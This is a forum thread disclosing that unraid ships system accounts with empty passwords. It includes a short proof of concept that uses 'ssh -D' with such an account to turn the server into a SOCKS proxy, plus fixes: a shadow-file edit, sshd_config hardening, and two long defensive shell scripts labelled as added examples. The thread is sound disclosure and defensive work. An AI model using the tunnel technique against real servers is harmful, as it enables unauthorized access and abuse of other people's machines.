Mihai

No passwords for system users - unraid can be used as a rogue ssh tunnel


Hello guys,

I couldn't find any proper channels for announcing vulnerabilities, so I think this might be the best way to catch your attention. Apologies if there are proper channels; I did not have enough time to search for them.

 

Upon looking at some logs I noticed:

```sshd[28121]: Accepted none for lp from 194.61.26.34 port 26028 ssh2```

 

Then, after I took a close look at /etc/shadow, I noticed almost all users don't have passwords.

While they can't actually execute commands on the system, they can see information about the system:

```
$ ssh unraid -l news
Linux 4.19.107-Unraid.
Could not chdir to home directory /usr/lib/news: No such file or directory
Connection to unraid closed.
$
```

 

Most troublesome, and maybe you guys are not aware of this: in order to open an ssh tunnel you don't need an actual shell.

 

```
$ ssh -D 3129 -f -C -q -N lp@unraid
$ netstat -plan | grep 3129
tcp        0      0 127.0.0.1:3129          0.0.0.0:*               LISTEN      1658854/ssh
```

Voilà! Then you have an ssh tunnel open.

For now I patched my box, but of course it won't survive a reboot.

 

An easy fix would be:

`sed -i -e 's/::1/:!!:1/g' /etc/shadow`

 

Cheerio,

Mihai

 

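The two checks in the post above (an "Accepted none" line in the sshd log, and accounts with an empty password field in /etc/shadow) plus the lock-out, written up as an added example script. This is not code from the post and not part of unraid; the log lines and shadow entries it works on are constructed for the example, and it locks on the password field being empty rather than on the literal `::1` substring the sed one-liner matches, so it catches every such account whatever the date field says:

```shell
#!/bin/sh
# Added example, not from the forum post and not unraid's code. All sample
# data below is constructed for this script.

# Sample sshd log lines (constructed). "Accepted none" means the 'none'
# authentication method succeeded, i.e. an account with an empty password
# was logged in without presenting any credential.
sample_sshd_log() {
    cat <<'EOF'
Mar 14 10:02:11 tower sshd[28121]: Accepted none for lp from 194.61.26.34 port 26028 ssh2
Mar 14 10:03:40 tower sshd[28130]: Failed password for root from 10.0.0.9 port 51022 ssh2
Mar 14 10:05:02 tower sshd[28144]: Accepted publickey for root from 10.0.0.2 port 51100 ssh2
Mar 14 10:07:55 tower sshd[28170]: Accepted none for bin from 10.0.0.5 port 40122 ssh2
EOF
}

# Sample /etc/shadow (constructed; the root hash is a placeholder, not a real one).
sample_shadow() {
    cat <<'EOF'
root:$6$examplesalt$examplehash:18350:0:::::
bin::9797:0:::::
lp::9797:0:::::
news::9797:0:::::
nobody:*:9797:0:::::
EOF
}

# Print "user source-ip" for every sshd line that accepted the 'none' method.
# $1: file of sshd log lines
accepted_none_logins() {
    awk '/sshd\[[0-9]*\]: Accepted none for / {
        for (i = 1; i <= NF; i++) if ($i == "for") print $(i + 1), $(i + 3)
    }' "$1"
}

# Print accounts whose password field (field 2) is empty. Each of them can log
# in through sshd with no credential at all while PermitEmptyPasswords is yes.
# $1: file in /etc/shadow format
empty_password_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Write a copy of the shadow file with every empty password field set to "!!",
# which no password hashes to, leaving every other field untouched. It works
# on a copy so the live /etc/shadow only changes if you install the result.
# $1: input shadow file, $2: output path
lock_empty_passwords() {
    awk -F: 'BEGIN { OFS = ":" } $2 == "" { $2 = "!!" } { print }' "$1" > "$2"
}

# Stand-alone demo on the constructed data.
demo() {
    tmp=$(mktemp -d)
    sample_sshd_log > "$tmp/messages"
    sample_shadow > "$tmp/shadow"
    echo "== logins that used the 'none' method:"
    accepted_none_logins "$tmp/messages"
    echo "== accounts with an empty password field:"
    empty_password_accounts "$tmp/shadow"
    lock_empty_passwords "$tmp/shadow" "$tmp/shadow.locked"
    echo "== shadow after locking:"
    cat "$tmp/shadow.locked"
    rm -rf "$tmp"
}
demo
```

On a real box, run `accepted_none_logins` over the authentication log to find out whether anyone already used one of these accounts, and diff the locked copy against /etc/shadow before installing it. Locking the password field is only half of the fix, since the sshd side (PermitEmptyPasswords) decides whether an empty field is accepted at all.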

Btw, here's a PoC in bash (anonymized the IPs a bit, hope you don't mind :P )

```
[root@taicasimaica ~]# curl -ks4 showip.net
124.122.71.51
[root@taicasimaica ~]# ssh -D 3129 -f -C -q -N bin@x.ninja -p 7127
The authenticity of host '[x.ninja]:7127 ([91.82.91.172]:7127)' can't be established.
ECDSA key fingerprint is SHA256:/Kg3rfHXB/0XIa2nW5UHOLAiipUztnhNDvxAyz91CP8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
[root@taicasimaica ~]# export http_proxy=socks5://127.0.0.1:3129
[root@taicasimaica ~]# curl -ks4 showip.net
91.82.91.172
[root@taicasimaica ~]#
```


Thanks for reporting, I have made an internal report for follow-up.

21 hours ago, Mihai said:

An easy fix would be:

Would it be better to change this line in /etc/ssh/sshd_config:

```
PermitEmptyPasswords yes
```

to

```
PermitEmptyPasswords no
```


Or... how about if we add this to sshd_config:

```
AllowTcpForwarding no
Match Group root
AllowTcpForwarding yes
```

Then only 'root' user can set up forwarding.

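The two sshd_config proposals above (PermitEmptyPasswords no, and AllowTcpForwarding no with a Match Group root exception) both depend on how sshd resolves an option, which is easy to get wrong when editing a file that already has settings. The script below is an added example, not code from the thread or from unraid: it resolves the value sshd would use for an option, for a given user and primary group, from an sshd_config-style file, applying the rules from sshd_config(5). The three sample configs in it are constructed, and only `Match all`, `Match User` and `Match Group` criteria are modelled, which is a simplification of real sshd matching:

```shell
#!/bin/sh
# Added example, not from the thread and not unraid's code. Rules modelled,
# from sshd_config(5):
#   - the FIRST value of an option seen in the global section wins; later
#     duplicates are ignored
#   - every line after a "Match" line belongs to a Match block, never to the
#     global section, so Match blocks must sit at the end of the file
#   - a Match block whose criteria fit the connection overrides the global
#     value; among several matching blocks the first to set the option wins
# Only "Match all", "Match User ..." and "Match Group ..." (comma-separated
# name lists) are handled here; other criteria are treated as not matching.

sshd_effective_option() {
    # $1 option keyword (any case), $2 user, $3 primary group, $4 config file
    awk -v key="$1" -v user="$2" -v group="$3" '
        BEGIN {
            key = tolower(key)
            # compiled-in defaults for the two options discussed in the thread
            def["permitemptypasswords"] = "no"
            def["allowtcpforwarding"]   = "yes"
        }
        function listhas(list, name,    n, i, parts) {
            n = split(list, parts, ",")
            for (i = 1; i <= n; i++) if (parts[i] == name) return 1
            return 0
        }
        /^[ \t]*#/ || NF == 0 { next }
        tolower($1) == "match" {
            in_match = 1; active = 1
            if (NF == 2 && tolower($2) == "all") next
            # every criterion on the Match line must hold for the block to apply
            for (j = 2; j < NF; j += 2) {
                crit = tolower($j)
                if (crit == "user")       { if (!listhas($(j + 1), user))  active = 0 }
                else if (crit == "group") { if (!listhas($(j + 1), group)) active = 0 }
                else active = 0      # Address, Host, ... not modelled: no match
            }
            next
        }
        tolower($1) != key { next }
        !in_match && !have_global         { gval = $2; have_global = 1 }
        in_match && active && !have_match { mval = $2; have_match = 1 }
        END {
            if (have_match) print mval
            else if (have_global) print gval
            else print def[key]
        }
    ' "$4"
}

# Constructed sample: the line the reply above quotes from /etc/ssh/sshd_config.
weak_sshd_config() {
    cat <<'EOF'
PermitEmptyPasswords yes
EOF
}

# Constructed sample: the hardening proposed in the replies above.
hardened_sshd_config() {
    cat <<'EOF'
PermitEmptyPasswords no
AllowTcpForwarding no
Match Group root
    AllowTcpForwarding yes
EOF
}

# Constructed sample of a common mistake: "PermitEmptyPasswords no" appended
# to a file that already says yes and already ends in a Match block. The new
# line lands inside "Match Group root", so it only affects root; as a global
# line it would still lose to the earlier "yes".
appended_sshd_config() {
    cat <<'EOF'
PermitEmptyPasswords yes
Match Group root
    AllowTcpForwarding yes
PermitEmptyPasswords no
EOF
}

# Stand-alone demo: effective values for the lp and root accounts.
demo() {
    tmp=$(mktemp -d)
    for cfg in weak hardened appended; do
        ${cfg}_sshd_config > "$tmp/$cfg"
        for u in lp root; do
            printf '%-9s %-5s PermitEmptyPasswords=%-3s AllowTcpForwarding=%s\n' "$cfg" "$u" \
                "$(sshd_effective_option PermitEmptyPasswords "$u" "$u" "$tmp/$cfg")" \
                "$(sshd_effective_option AllowTcpForwarding "$u" "$u" "$tmp/$cfg")"
        done
    done
    rm -rf "$tmp"
}
demo
```

On the box itself the authoritative check is `sshd -T -C user=lp` (add `addr=` and friends as needed), which prints the configuration sshd would apply to that connection after Match processing; the script is for reasoning about a config file offline. Note also that `AllowTcpForwarding no` only refuses the forwarding request: the lp account still authenticates and the session still opens, which is why disabling the accounts themselves, as the follow-up reply says, belongs in the fix as well.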

I would use these sshd configurations plus setting the users to disabled. I don't think having users with empty passwords is a good idea.

Thanks for the fast reply!
